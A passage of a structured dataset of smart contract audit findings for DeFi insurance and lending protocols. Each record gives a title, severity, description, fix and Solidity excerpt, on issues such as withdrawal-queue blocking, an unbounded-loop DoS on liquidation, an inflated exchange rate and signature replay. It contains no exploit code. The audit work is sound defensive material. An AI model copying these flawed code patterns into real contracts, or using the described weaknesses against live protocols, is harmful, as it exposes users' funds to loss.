aggregatedQueueAmount.add(\\_currentWithdrawalAmount);\\n withdrawalQueue.push(\\_msgSender());\\n \\n \\_withdrawLiquidity(\\_msgSender(), \\_availableDAIxTokens);\\n} else {\\n```\\n\\nIf there's a huge request in the queue, it can become a bottleneck that does not allow others to withdraw even if there is enough free liquidity.\\nWithdrawals can be blocked forever by the bots.\\nThe withdrawal can only be requested if there are enough free funds in the contract. But once these funds appear, the bots can instantly buy a policy, and for the normal users, it will be impossible to request the withdrawal. 
Even when a withdrawal is requested and then in the queue, the same problem appears at that stage.\\nThe policy can be bought even if there are pending withdrawals in the queue.чOne of the solutions would be to implement the following changes, but the team should thoroughly consider them:\\nAllow people to request the withdrawal even if there is not enough liquidity at the moment.\\nDo not allow people to buy policies if there are pending withdrawals in the queue and cannot be executed.\\n(Optional) Even when the queue is empty, do not allow people to buy policies if there is not enough liquidity for the pending requests (that are not yet in the queue).\\n(Optional if the points above are implemented) Allow partial executions of the withdrawals in the queue.чч```\\naddress \\_currentAddr = withdrawalQueue.head();\\nuint256 \\_tokensToWithdraw = withdrawalsInfo[\\_currentAddr].withdrawalAmount;\\n \\nuint256 \\_amountInDAI = convertDAIXtoDAI(\\_tokensToWithdraw);\\n \\nif (\\_availableLiquidity < \\_amountInDAI) {\\n break;\\n}\\n```\\n -The totalCoverTokens can be decreased before the claim is committedчhighчThe `totalCoverTokens` is decreased right after the policy duration ends (_endEpochNumber). When that happens, the liquidity providers can withdraw their funds:\\n```\\npolicyHolders[\\_msgSender()] = PolicyHolder(\\_coverTokens, currentEpochNumber,\\n \\_endEpochNumber, \\_totalPrice, \\_reinsurancePrice);\\n\\nepochAmounts[\\_endEpochNumber] = epochAmounts[\\_endEpochNumber].add(\\_coverTokens);\\n```\\n\\n```\\nuint256 \\_countOfPassedEpoch = block.timestamp.sub(epochStartTime).div(EPOCH\\_DURATION);\\n\\nnewTotalCoverTokens = totalCoverTokens;\\nlastEpochUpdate = currentEpochNumber;\\nnewEpochNumber = \\_countOfPassedEpoch.add(1);\\n\\nfor (uint256 i = lastEpochUpdate; i < newEpochNumber; i++) {\\n newTotalCoverTokens = newTotalCoverTokens.sub(epochAmounts[i]); \\n}\\n```\\n\\nOn the other hand, the claim can be created while the policy is still “active”. 
And is considered active until one week after the policy expired:\\n```\\nfunction isPolicyActive(address \\_userAddr, address \\_policyBookAddr) public override view returns (bool) {\\n PolicyInfo storage \\_currentInfo = policyInfos[\\_userAddr][\\_policyBookAddr];\\n\\n if (\\_currentInfo.endTime == 0) {\\n return false;\\n }\\n\\n return \\_currentInfo.endTime.add(STILL\\_CLAIMABLE\\_FOR) > block.timestamp;\\n}\\n```\\n\\nBy the time when the claim is created + voted, the liquidity provider can potentially withdraw all of their funds already, and the claim will fail.чMake sure that there will always be enough funds for the claim.чч```\\npolicyHolders[\\_msgSender()] = PolicyHolder(\\_coverTokens, currentEpochNumber,\\n \\_endEpochNumber, \\_totalPrice, \\_reinsurancePrice);\\n\\nepochAmounts[\\_endEpochNumber] = epochAmounts[\\_endEpochNumber].add(\\_coverTokens);\\n```\\n -The totalCoverTokens is not decreased after the claim happenedчhighчWhen the claim happens and the policy is removed, the `totalCoverTokens` should be decreased instantly, that's why the scheduled reduction value is removed:\\n```\\nPolicyHolder storage holder = policyHolders[claimer];\\n\\nepochAmounts[holder.endEpochNumber] = epochAmounts[holder.endEpochNumber].sub(holder.coverTokens);\\ntotalLiquidity = totalLiquidity.sub(claimAmount);\\n\\ndaiToken.transfer(claimer, claimAmount);\\n \\ndelete policyHolders[claimer];\\npolicyRegistry.removePolicy(claimer);\\n```\\n\\nBut the `totalCoverTokens` is not changed and will have the coverage from the removed policy forever.чDecrease the `totalCoverTokens` inside the `commitClaim` function.чч```\\nPolicyHolder storage holder = policyHolders[claimer];\\n\\nepochAmounts[holder.endEpochNumber] = epochAmounts[holder.endEpochNumber].sub(holder.coverTokens);\\ntotalLiquidity = totalLiquidity.sub(claimAmount);\\n\\ndaiToken.transfer(claimer, claimAmount);\\n \\ndelete policyHolders[claimer];\\npolicyRegistry.removePolicy(claimer);\\n```\\n -The Queue 
remove function does not remove the item completelyчhighчWhen removing an item in a queue, the following function is used:\\n```\\nfunction remove(UniqueAddressQueue storage baseQueue, address addrToRemove) internal returns (bool) {\\n if (!contains(baseQueue, addrToRemove)) {\\n return false;\\n }\\n\\n if (baseQueue.HEAD == addrToRemove) {\\n return removeFirst(baseQueue);\\n }\\n\\n if (baseQueue.TAIL == addrToRemove) {\\n return removeLast(baseQueue);\\n }\\n\\n address prevAddr = baseQueue.queue[addrToRemove].prev;\\n address nextAddr = baseQueue.queue[addrToRemove].next;\\n baseQueue.queue[prevAddr].next = nextAddr;\\n baseQueue.queue[nextAddr].prev = prevAddr;\\n baseQueue.queueLength--;\\n\\n return true;\\n}\\n```\\n\\nAs the result, the `baseQueue.queue[addrToRemove]` is not deleted, so the `contains` function will still return `True` after the removal.чRemove the element from the queue completely.чч```\\nfunction remove(UniqueAddressQueue storage baseQueue, address addrToRemove) internal returns (bool) {\\n if (!contains(baseQueue, addrToRemove)) {\\n return false;\\n }\\n\\n if (baseQueue.HEAD == addrToRemove) {\\n return removeFirst(baseQueue);\\n }\\n\\n if (baseQueue.TAIL == addrToRemove) {\\n return removeLast(baseQueue);\\n }\\n\\n address prevAddr = baseQueue.queue[addrToRemove].prev;\\n address nextAddr = baseQueue.queue[addrToRemove].next;\\n baseQueue.queue[prevAddr].next = nextAddr;\\n baseQueue.queue[nextAddr].prev = prevAddr;\\n baseQueue.queueLength--;\\n\\n return true;\\n}\\n```\\n -Optimization issueчmediumчThe codebase is huge, and there are still a lot of places where these complications and gas efficiency can be improved.\\n`_updateTopUsers`, `_updateGroupLeaders`, `_updateLeaderboard` are having a similar mechanism of adding users to a sorted set which makes more storage operations than needed:\\n```\\nuint256 \\_tmpIndex = \\_currentIndex - 1;\\nuint256 \\_currentUserAmount = usersTeamInfo[msg.sender].stakedAmount;\\n \\nwhile 
(\\_currentUserAmount > usersTeamInfo[topUsers[\\_tmpIndex]].stakedAmount) {\\n address \\_tmpAddr = topUsers[\\_tmpIndex];\\n topUsers[\\_tmpIndex] = msg.sender;\\n topUsers[\\_tmpIndex + 1] = \\_tmpAddr;\\n \\n if (\\_tmpIndex == 0) {\\n break;\\n }\\n \\n \\_tmpIndex--;\\n}\\n```\\n\\nInstead of doing 2 operations per item that is lower than the new_item, same can be done with one operation: while `topUsers[_tmpIndex]` is lower than the new itemtopUsers[_tmpIndex + 1] = `topUsers[_tmpIndex]`.\\ncreating the Queue library looks like overkill `for` the intended task. It is only used `for` the withdrawal queue in the PolicyBook. The structure stores and processes extra data, which is unnecessary and more expensive. A larger codebase also has a higher chance of introducing a bug (and it happened here https://github.com/ConsenSys/bridge-mutual-audit-2021-03/issues/25). It's usually better to have a simpler and optimized version like described here issue 5.14.\\nThere are a few `for` loops that are using `uint8` iterators. It's unnecessary and can be even more expensive because, under the hood, it's additionally converted to `uint256` all the time. 
In general, shrinking data to `uint8` makes sense to optimize storage slots, but that's not the case here.\\nThe value that is calculated in a loop can be obtained simpler by just having a 1-line formula:\\n```\\nfunction \\_getAvailableMonthForReward(address \\_userAddr) internal view returns (uint256) {\\n uint256 \\_oneMonth = 30 days;\\n uint256 \\_startRewardTime = getEndLMTime();\\n \\n uint256 \\_countOfRewardedMonth = countsOfRewardedMonth[usersTeamInfo[\\_userAddr].teamAddr][\\_userAddr];\\n uint256 \\_numberOfMonthForReward;\\n \\n for (uint256 i = \\_countOfRewardedMonth; i < MAX\\_MONTH\\_TO\\_GET\\_REWARD; i++) {\\n if (block.timestamp > \\_startRewardTime.add(\\_oneMonth.mul(i))) {\\n \\_numberOfMonthForReward++;\\n } else {\\n break;\\n }\\n }\\n \\n return \\_numberOfMonthForReward;\\n}\\n```\\n\\nThe mapping is using 2 keys, but the first key is strictly defined by the second one, so there's no need for it:\\n```\\n// Referral link => Address => count of rewarded month\\nmapping (address => mapping (address => uint256)) public countsOfRewardedMonth;\\n```\\n\\nThere are a lot of structures in the code with duplicated and unnecessary data, for example:\\n```\\nstruct UserTeamInfo {\\n string teamName;\\n address teamAddr;\\n \\n uint256 stakedAmount;\\n bool isNFTDistributed;\\n}\\n```\\n\\nHere the structure is created for every team member, duplicating the team name for each member.чOptimize and simplify the code.чч```\\nuint256 \\_tmpIndex = \\_currentIndex - 1;\\nuint256 \\_currentUserAmount = usersTeamInfo[msg.sender].stakedAmount;\\n \\nwhile (\\_currentUserAmount > usersTeamInfo[topUsers[\\_tmpIndex]].stakedAmount) {\\n address \\_tmpAddr = topUsers[\\_tmpIndex];\\n topUsers[\\_tmpIndex] = msg.sender;\\n topUsers[\\_tmpIndex + 1] = \\_tmpAddr;\\n \\n if (\\_tmpIndex == 0) {\\n break;\\n }\\n \\n \\_tmpIndex--;\\n}\\n```\\n -The aggregatedQueueAmount value is used inconsistentlyчmediumчThe `aggregatedQueueAmount` variable represents the 
cumulative DAIx amount in the queue that is waiting for the withdrawal. When requesting the withdrawal, this value is used as the amount of DAI that needs to be withdrawn, which may be significantly different:\\n```\\nrequire(totalLiquidity >= totalCoverTokens.add(aggregatedQueueAmount).add(\\_daiTokensToWithdraw),\\n \"PB: Not enough available liquidity\");\\n```\\n\\nThat may lead to allowing the withdrawal request even if it shouldn't be allowed and the opposite.чConvert `aggregatedQueueAmount` to DAI in the `_requestWithdrawal`.чч```\\nrequire(totalLiquidity >= totalCoverTokens.add(aggregatedQueueAmount).add(\\_daiTokensToWithdraw),\\n \"PB: Not enough available liquidity\");\\n```\\n -The claim can only be done onceчmediumчWhen the claim happens, the policy is removed afterward:\\n```\\nfunction commitClaim(address claimer, uint256 claimAmount)\\n external \\n override\\n onlyClaimVoting\\n updateBMIDAIXStakingReward\\n{\\n PolicyHolder storage holder = policyHolders[claimer];\\n\\n epochAmounts[holder.endEpochNumber] = epochAmounts[holder.endEpochNumber].sub(holder.coverTokens);\\n totalLiquidity = totalLiquidity.sub(claimAmount);\\n \\n daiToken.transfer(claimer, claimAmount);\\n \\n delete policyHolders[claimer];\\n policyRegistry.removePolicy(claimer);\\n}\\n```\\n\\nIf the claim amount is much lower than the coverage, the users are incentivized not to submit it and wait until the end of the coverage period to accumulate all the claims into one.чAllow the policyholders to submit multiple claims until the `coverTokens` is not reached.чч```\\nfunction commitClaim(address claimer, uint256 claimAmount)\\n external \\n override\\n onlyClaimVoting\\n updateBMIDAIXStakingReward\\n{\\n PolicyHolder storage holder = policyHolders[claimer];\\n\\n epochAmounts[holder.endEpochNumber] = epochAmounts[holder.endEpochNumber].sub(holder.coverTokens);\\n totalLiquidity = totalLiquidity.sub(claimAmount);\\n \\n daiToken.transfer(claimer, claimAmount);\\n \\n delete 
policyHolders[claimer];\\n policyRegistry.removePolicy(claimer);\\n}\\n```\\n -iETH.exchangeRateStored may not be accurate when invoked from external contractsчhighч`iETH.exchangeRateStored` returns the exchange rate of the contract as a function of the current cash of the contract. In the case of `iETH`, current cash is calculated as the contract's ETH balance minus msg.value:\\n```\\n/\\*\\*\\n \\* @dev Gets balance of this contract in terms of the underlying\\n \\*/\\nfunction \\_getCurrentCash() internal view override returns (uint256) {\\n return address(this).balance.sub(msg.value);\\n}\\n```\\n\\n`msg.value` is subtracted because the majority of `iETH` methods are payable, and `msg.value` is implicitly added to a contract's balance before execution begins. If `msg.value` were not subtracted, the value sent with a call could be used to inflate the contract's exchange rate artificially.\\nAs part of execution, `iETH` makes calls to the `Controller`, which performs important checks using (among other things) the stored exchange rate. When `exchangeRateStored` is invoked from the `Controller`, the call context has a `msg.value` of 0. However, the `msg.value` sent by the initial `iETH` execution is still included in the contract's balance. This means that the `Controller` receives an exchange rate inflated by the initial call's `msg.value`.\\nThis problem occurs in multiple locations in the Controller:\\n`beforeMint` uses the exchange rate to ensure the supply capacity of the market is not reached. 
In this case, inflation would prevent the entire supply capacity of the market from being utilized:\\n```\\n// Check the iToken's supply capacity, -1 means no limit\\nuint256 \\_totalSupplyUnderlying =\\n IERC20Upgradeable(\\_iToken).totalSupply().rmul(\\n IiToken(\\_iToken).exchangeRateStored()\\n );\\nrequire(\\n \\_totalSupplyUnderlying.add(\\_mintAmount) <= \\_market.supplyCapacity,\\n \"Token supply capacity reached\"\\n);\\n```\\n\\n`beforeLiquidateBorrow` uses the exchange rate via `calcAccountEquity` to calculate the value of the borrower's collateral. In this case, inflation would increase the account's equity, which could prevent the liquidator from liquidating:\\n```\\n(, uint256 \\_shortfall, , ) = calcAccountEquity(\\_borrower);\\n\\nrequire(\\_shortfall > 0, \"Account does not have shortfall\");\\n```\\nчResolution\\nThis issue was addressed in commit `9876e3a` by using a modifier to track the current `msg.value` of payable functions.\\nRather than having the `Controller` query the `iETH.exchangeRateStored`, the exchange rate could be passed-in to `Controller` methods as a parameter.\\nEnsure no other components in the system rely on `iETH.exchangeRateStored` after being called from `iETH`.чч```\\n/\\*\\*\\n \\* @dev Gets balance of this contract in terms of the underlying\\n \\*/\\nfunction \\_getCurrentCash() internal view override returns (uint256) {\\n return address(this).balance.sub(msg.value);\\n}\\n```\\n -Unbounded loop in Controller.calcAccountEquity allows DoS on liquidationчhighч`Controller.calcAccountEquity` calculates the relative value of a user's supplied collateral and their active borrow positions. Users may mark an arbitrary number of assets as collateral, and may borrow from an arbitrary number of assets. 
In order to calculate the value of both of these positions, this method performs two loops.\\nFirst, to calculate the sum of the value of a user's collateral:\\n```\\n// Calculate value of all collaterals\\n// collateralValuePerToken = underlyingPrice \\* exchangeRate \\* collateralFactor\\n// collateralValue = balance \\* collateralValuePerToken\\n// sumCollateral += collateralValue\\nuint256 \\_len = \\_accountData.collaterals.length();\\nfor (uint256 i = 0; i < \\_len; i++) {\\n IiToken \\_token = IiToken(\\_accountData.collaterals.at(i));\\n```\\n\\nSecond, to calculate the sum of the value of a user's borrow positions:\\n```\\n// Calculate all borrowed value\\n// borrowValue = underlyingPrice \\* underlyingBorrowed / borrowFactor\\n// sumBorrowed += borrowValue\\n\\_len = \\_accountData.borrowed.length();\\nfor (uint256 i = 0; i < \\_len; i++) {\\n IiToken \\_token = IiToken(\\_accountData.borrowed.at(i));\\n```\\n\\nFrom dForce, we learned that 200 or more assets would be supported by the Controller. This means that a user with active collateral and borrow positions on all 200 supported assets could force any `calcAccountEquity` action to perform some 400 iterations of these loops, each with several expensive external calls.\\nBy modifying dForce's unit test suite, we showed that an attacker could force the cost of `calcAccountEquity` above the block gas limit. This would prevent all of the following actions, as each relies on calcAccountEquity:\\n`iToken.transfer` and `iToken.transferFrom`\\n`iToken.redeem` and `iToken.redeemUnderlying`\\n`iToken.borrow`\\n`iToken.liquidateBorrow` and `iToken.seize`\\nThe following actions would still be possible:\\n`iToken.mint`\\n`iToken.repayBorrow` and `iToken.repayBorrowBehalf`\\nAs a result, an attacker may abuse the unbounded looping in `calcAccountEquity` to prevent the liquidation of underwater positions. We provided dForce with a PoC here: gist.чThere are many possible ways to address this issue. 
Some ideas have been outlined below, and it may be that a combination of these ideas is the best approach:\\nIn general, cap the number of markets and borrowed assets a user may have: The primary cause of the DoS is that the number of collateral and borrow positions held by a user is only restricted by the number of supported assets. The PoC provided above showed that somewhere around 150 collateral positions and 150 borrow positions, the gas costs of `calcAccountEquity` use most of the gas in a block. Given that gas prices often spike along with turbulent market conditions and that liquidations are far more likely in turbulent market conditions, a cap on active markets / borrows should be much lower than 150 each so as to keep the cost of liquidations as low as possible.\\ndForce should perform their own gas cost estimates to determine a cap, and choose a safe, low value. Estimates should be performed on the high-level `liquidateBorrow` method, so as to simulate an actual liquidation event. Additionally, estimates should factor in a changing block gas limit, and the possibility of opcode gas costs changing in future forks. 
It may be wise to make this cap configurable, so that the limits may be adjusted for future conditions.чч```\\n// Calculate value of all collaterals\\n// collateralValuePerToken = underlyingPrice \\* exchangeRate \\* collateralFactor\\n// collateralValue = balance \\* collateralValuePerToken\\n// sumCollateral += collateralValue\\nuint256 \\_len = \\_accountData.collaterals.length();\\nfor (uint256 i = 0; i < \\_len; i++) {\\n IiToken \\_token = IiToken(\\_accountData.collaterals.at(i));\\n```\\n -Fix utilization rate computation and respect reserves when lendingчmediumчThe utilization rate `UR` of an asset forms the basis for interest calculations and is defined as `borrows / ( borrows + cash - reserves)`.\\n```\\n/\\*\\*\\n \\* @notice Calculate the utilization rate: `\\_borrows / (\\_cash + \\_borrows - \\_reserves)`\\n \\* @param \\_cash Asset balance\\n \\* @param \\_borrows Asset borrows\\n \\* @param \\_reserves Asset reserves\\n \\* @return Asset utilization [0, 1e18]\\n \\*/\\nfunction utilizationRate(\\n uint256 \\_cash,\\n uint256 \\_borrows,\\n uint256 \\_reserves\\n) internal pure returns (uint256) {\\n // Utilization rate is 0 when there are no borrows\\n if (\\_borrows == 0) return 0;\\n\\n return \\_borrows.mul(BASE).div(\\_cash.add(\\_borrows).sub(\\_reserves));\\n}\\n```\\n\\nThe implicit assumption here is that `reserves` <= cash; in this case — and if we define `UR` as `0` for `borrows == 0` — we have `0` <= `UR` <=1. We can view `cash` - `reserves` as “available cash”. However, the system does not guarantee that `reserves` never exceeds `cash`. If `reserves` > `cash` (and borrows + `cash` - `reserves` > 0), the formula for `UR` above gives a utilization rate above `1`. 
This doesn't make much sense conceptually and has undesirable technical consequences; an especially severe one is analyzed in issue 4.4.чIf `reserves > cash` — or, in other words, available cash is negative — this means part of the `reserves` have been borrowed, which ideally shouldn't happen in the first place. However, the `reserves` grow automatically over time, so it might be difficult to avoid this entirely. We recommend (1) avoiding this situation whenever it is possible and (2) fixing the `UR` computation such that it deals more gracefully with this scenario. More specifically:\\nLoan amounts should not be checked to be smaller than or equal to `cash` but `cash - reserves` (which might be negative). Note that the current check against `cash` happens more or less implicitly because the transfer just fails for insufficient `cash`.\\nMake the utilization rate computation return `1` if `reserves > cash` (unless borrows == `0`, in which case return `0` as is already the case).\\nRemark\\nInternally, the utilization rate and other fractional values are scaled by `1e18`. The discussion above has a more conceptual than technical perspective, so we used unscaled numbers. 
When making changes to the code, care must be taken to apply the scaling.чч```\\n/\\*\\*\\n \\* @notice Calculate the utilization rate: `\\_borrows / (\\_cash + \\_borrows - \\_reserves)`\\n \\* @param \\_cash Asset balance\\n \\* @param \\_borrows Asset borrows\\n \\* @param \\_reserves Asset reserves\\n \\* @return Asset utilization [0, 1e18]\\n \\*/\\nfunction utilizationRate(\\n uint256 \\_cash,\\n uint256 \\_borrows,\\n uint256 \\_reserves\\n) internal pure returns (uint256) {\\n // Utilization rate is 0 when there are no borrows\\n if (\\_borrows == 0) return 0;\\n\\n return \\_borrows.mul(BASE).div(\\_cash.add(\\_borrows).sub(\\_reserves));\\n}\\n```\\n -If Base._updateInterest fails, the entire system will haltчmediumчBefore executing most methods, the `iETH` and `iToken` contracts update interest accumulated on borrows via the method `Base._updateInterest`. This method uses the contract's interest rate model to calculate the borrow interest rate. If the calculated value is above `maxBorrowRate` (0.001e18), the method will revert:\\n```\\nfunction \\_updateInterest() internal virtual override {\\n InterestLocalVars memory \\_vars;\\n \\_vars.currentCash = \\_getCurrentCash();\\n \\_vars.totalBorrows = totalBorrows;\\n \\_vars.totalReserves = totalReserves;\\n\\n // Gets the current borrow interest rate.\\n \\_vars.borrowRate = interestRateModel.getBorrowRate(\\n \\_vars.currentCash,\\n \\_vars.totalBorrows,\\n \\_vars.totalReserves\\n );\\n require(\\n \\_vars.borrowRate <= maxBorrowRate,\\n \"\\_updateInterest: Borrow rate is too high!\"\\n );\\n```\\n\\nIf this method reverts, the entire contract may halt and be unrecoverable. The only ways to change the values used to calculate this interest rate lie in methods that must first call `Base._updateInterest`. 
In this case, those methods would fail.\\nOne other potential avenue for recovery exists: the Owner role may update the interest rate calculation contract via TokenAdmin._setInterestRateModel:\\n```\\n/\\*\\*\\n \\* @dev Sets a new interest rate model.\\n \\* @param \\_newInterestRateModel The new interest rate model.\\n \\*/\\nfunction \\_setInterestRateModel(\\n IInterestRateModelInterface \\_newInterestRateModel\\n) external virtual onlyOwner settleInterest {\\n // Gets current interest rate model.\\n IInterestRateModelInterface \\_oldInterestRateModel = interestRateModel;\\n\\n // Ensures the input address is the interest model contract.\\n require(\\n \\_newInterestRateModel.isInterestRateModel(),\\n \"\\_setInterestRateModel: This is not the rate model contract!\"\\n );\\n\\n // Set to the new interest rate model.\\n interestRateModel = \\_newInterestRateModel;\\n```\\n\\nHowever, this method also calls `Base._updateInterest` before completing the upgrade, so it would fail as well.\\nWe used interest rate parameters taken from dForce's unit tests to determine whether any of the interest rate models could return a borrow rate that would cause this failure. The default `InterestRateModel` is deployed using these values:\\n```\\nbaseInterestPerBlock: 0\\ninterestPerBlock: 5.074e10\\nhighInterestPerBlock: 4.756e11\\nhigh: 0.75e18\\n```\\n\\nPlugging these values in to their borrow rate calculations, we determined that the utilization rate of the contract would need to be `2103e18` in order to reach the max borrow rate and trigger a failure. 
Plugging this in to the formula for utilization rate, we derived the following ratio:\\n`reserves >= (2102/2103)*borrows + cash`\\nWith the given interest rate parameters, if token reserves, total borrows, and underlying cash meet the above ratio, the interest rate model would return a borrow rate above the maximum, leading to the failure conditions described above.чNote that the examples above depend on the specific interest rate parameters configured by dForce. In general, with reasonable interest rate parameters and a reasonable reserve ratio, it seems unlikely that the maximum borrow rate will be reached. Consider implementing the following changes as a precaution:\\nAs utilization rate should be between `0` and `1` (scaled by 1e18), prevent utilization rate calculations from returning anything above `1e18`. See issue 4.3 for a more thorough discussion of this topic.\\nRemove the `settleInterest` modifier from TokenAdmin._setInterestRateModel: In a worst case scenario, this will allow the Owner role to update the interest rate model without triggering the failure in `Base._updateInterest`.чч```\\nfunction \\_updateInterest() internal virtual override {\\n InterestLocalVars memory \\_vars;\\n \\_vars.currentCash = \\_getCurrentCash();\\n \\_vars.totalBorrows = totalBorrows;\\n \\_vars.totalReserves = totalReserves;\\n\\n // Gets the current borrow interest rate.\\n \\_vars.borrowRate = interestRateModel.getBorrowRate(\\n \\_vars.currentCash,\\n \\_vars.totalBorrows,\\n \\_vars.totalReserves\\n );\\n require(\\n \\_vars.borrowRate <= maxBorrowRate,\\n \"\\_updateInterest: Borrow rate is too high!\"\\n );\\n```\\n -RewardDistributor requirement prevents transition of Owner role to smart contractчmediumчFrom dForce, we learned that the eventual plan for the system Owner role is to use a smart contract (a multisig or DAO). 
However, a requirement in `RewardDistributor` would prevent the `onlyOwner` method `_setDistributionFactors` from working in this case.\\n`_setDistributionFactors` calls `updateDistributionSpeed`, which requires that the caller is an EOA:\\n```\\n/\\*\\*\\n \\* @notice Update each iToken's distribution speed according to current global speed\\n \\* @dev Only EOA can call this function\\n \\*/\\nfunction updateDistributionSpeed() public override {\\n require(msg.sender == tx.origin, \"only EOA can update speeds\");\\n require(!paused, \"Can not update speeds when paused\");\\n\\n // Do the actual update\\n \\_updateDistributionSpeed();\\n}\\n```\\n\\nIn the event the Owner role is a smart contract, this statement would necessitate a complicated upgrade to restore full functionality.чRather than invoking `updateDistributionSpeed`, have `_setDistributionFactors` directly call the internal helper `_updateDistributionSpeed`, which does not require the caller is an EOA.чч```\\n/\\*\\*\\n \\* @notice Update each iToken's distribution speed according to current global speed\\n \\* @dev Only EOA can call this function\\n \\*/\\nfunction updateDistributionSpeed() public override {\\n require(msg.sender == tx.origin, \"only EOA can update speeds\");\\n require(!paused, \"Can not update speeds when paused\");\\n\\n // Do the actual update\\n \\_updateDistributionSpeed();\\n}\\n```\\n -MSDController._withdrawReserves does not update interest before withdrawalчmediumч`MSDController._withdrawReserves` allows the Owner to mint the difference between an MSD asset's accumulated debt and earnings:\\n```\\nfunction \\_withdrawReserves(address \\_token, uint256 \\_amount)\\n external\\n onlyOwner\\n onlyMSD(\\_token)\\n{\\n (uint256 \\_equity, ) = calcEquity(\\_token);\\n\\n require(\\_equity >= \\_amount, \"Token do not have enough reserve\");\\n\\n // Increase the token debt\\n msdTokenData[\\_token].debt = msdTokenData[\\_token].debt.add(\\_amount);\\n\\n // Directly mint the token 
to owner\\n MSD(\\_token).mint(owner, \\_amount);\\n```\\n\\nDebt and earnings are updated each time the asset's `iMSD` and `MSDS` contracts are used for the first time in a given block. Because `_withdrawReserves` does not force an update to these values, it is possible for the withdrawal amount to be calculated using stale values.чEnsure `_withdrawReserves` invokes `iMSD.updateInterest()` and `MSDS.updateInterest()`.чч```\\nfunction \\_withdrawReserves(address \\_token, uint256 \\_amount)\\n external\\n onlyOwner\\n onlyMSD(\\_token)\\n{\\n (uint256 \\_equity, ) = calcEquity(\\_token);\\n\\n require(\\_equity >= \\_amount, \"Token do not have enough reserve\");\\n\\n // Increase the token debt\\n msdTokenData[\\_token].debt = msdTokenData[\\_token].debt.add(\\_amount);\\n\\n // Directly mint the token to owner\\n MSD(\\_token).mint(owner, \\_amount);\\n```\\n -permit functions use deployment-time instead of execution-time chain IDчlowчThe contracts `Base`, `MSD`, and `MSDS` each have an EIP-2612-style `permit` function that supports approvals with EIP-712 signatures. 
We focus this discussion on the `Base` contract, but the same applies to `MSD` and `MSDS`.\\nWhen the contract is initialized, the chain ID is queried (with the `CHAINID` opcode) and becomes part of the `DOMAIN_SEPARATOR` — a hash of several values which (presumably) don't change over the lifetime of the contract and that can therefore be computed only once, when the contract is deployed.\\n```\\nfunction \\_initialize(\\n string memory \\_name,\\n string memory \\_symbol,\\n uint8 \\_decimals,\\n IControllerInterface \\_controller,\\n IInterestRateModelInterface \\_interestRateModel\\n) internal virtual {\\n controller = \\_controller;\\n interestRateModel = \\_interestRateModel;\\n accrualBlockNumber = block.number;\\n borrowIndex = BASE;\\n flashloanFeeRatio = 0.0008e18;\\n protocolFeeRatio = 0.25e18;\\n \\_\\_Ownable\\_init();\\n \\_\\_ERC20\\_init(\\_name, \\_symbol, \\_decimals);\\n \\_\\_ReentrancyGuard\\_init();\\n\\n uint256 chainId;\\n\\n assembly {\\n chainId := chainid()\\n }\\n DOMAIN\\_SEPARATOR = keccak256(\\n abi.encode(\\n keccak256(\\n \"EIP712Domain(string name,string version,uint256 chainId,address verifyingContract)\"\\n ),\\n keccak256(bytes(\\_name)),\\n keccak256(bytes(\"1\")),\\n chainId,\\n address(this)\\n )\\n );\\n}\\n```\\n\\nThe `DOMAIN_SEPARATOR` is supposed to prevent replay attacks by providing context for the signature; it is hashed into the digest to be signed.\\n```\\nbytes32 \\_digest =\\n keccak256(\\n abi.encodePacked(\\n \"\\x19\\x01\",\\n DOMAIN\\_SEPARATOR,\\n keccak256(\\n abi.encode(\\n PERMIT\\_TYPEHASH,\\n \\_owner,\\n \\_spender,\\n \\_value,\\n \\_currentNonce,\\n \\_deadline\\n )\\n )\\n )\\n );\\naddress \\_recoveredAddress = ecrecover(\\_digest, \\_v, \\_r, \\_s);\\nrequire(\\n \\_recoveredAddress != address(0) && \\_recoveredAddress == \\_owner,\\n \"permit: INVALID\\_SIGNATURE!\"\\n);\\n```\\n\\nThe chain ID is not necessarily constant, though. 
In the event of a chain split, only one of the resulting chains gets to keep the original chain ID and the other will have to use a new one. With the current pattern, a signature will be valid on both chains; if the `DOMAIN_SEPARATOR` is recomputed for every verification, a signature will only be valid on the chain that keeps the original ID — which is probably the intended behavior.\\nRemark\\nThe reason why the not necessarily constant chain ID is part of the supposedly constant `DOMAIN_SEPARATOR` is that EIP-712 predates the introduction of the `CHAINID` opcode. Originally, it was not possible to query the chain ID via opcode, so it had to be supplied to the constructor of a contract by the deployment script.чAn obvious fix is to compute the `DOMAIN_SEPARATOR` dynamically in `permit`. However, since a chain split is a relatively unlikely event, it makes sense to compute the `DOMAIN_SEPARATOR` at deployment/initialization time and then check in `permit` whether the current chain ID equals the one that went into the `DOMAIN_SEPARATOR`. If that is true, we proceed as before. If the chain ID has changed, we could (1) just revert, or (2) recompute the `DOMAIN_SEPARATOR` with the new chain ID. 
Solution (1) is probably the easiest and most straightforward to implement, but it should be noted that it makes the `permit` functionality of this contract completely unusable on the new chain.чч```\\nfunction \\_initialize(\\n string memory \\_name,\\n string memory \\_symbol,\\n uint8 \\_decimals,\\n IControllerInterface \\_controller,\\n IInterestRateModelInterface \\_interestRateModel\\n) internal virtual {\\n controller = \\_controller;\\n interestRateModel = \\_interestRateModel;\\n accrualBlockNumber = block.number;\\n borrowIndex = BASE;\\n flashloanFeeRatio = 0.0008e18;\\n protocolFeeRatio = 0.25e18;\\n \\_\\_Ownable\\_init();\\n \\_\\_ERC20\\_init(\\_name, \\_symbol, \\_decimals);\\n \\_\\_ReentrancyGuard\\_init();\\n\\n uint256 chainId;\\n\\n assembly {\\n chainId := chainid()\\n }\\n DOMAIN\\_SEPARATOR = keccak256(\\n abi.encode(\\n keccak256(\\n \"EIP712Domain(string name,string version,uint256 chainId,address verifyingContract)\"\\n ),\\n keccak256(bytes(\\_name)),\\n keccak256(bytes(\"1\")),\\n chainId,\\n address(this)\\n )\\n );\\n}\\n```\\n -iETH.receive() does not support contracts executing during their constructorчlowч`iETH.receive()` requires that the caller is a contract:\\n```\\n/\\*\\*\\n \\* @notice receive ETH, used for flashloan repay.\\n \\*/\\nreceive() external payable {\\n require(\\n msg.sender.isContract(),\\n \"receive: Only can call from a contract!\"\\n );\\n}\\n```\\n\\nThis method uses the `extcodesize` of an account to check that the account belongs to a contract. 
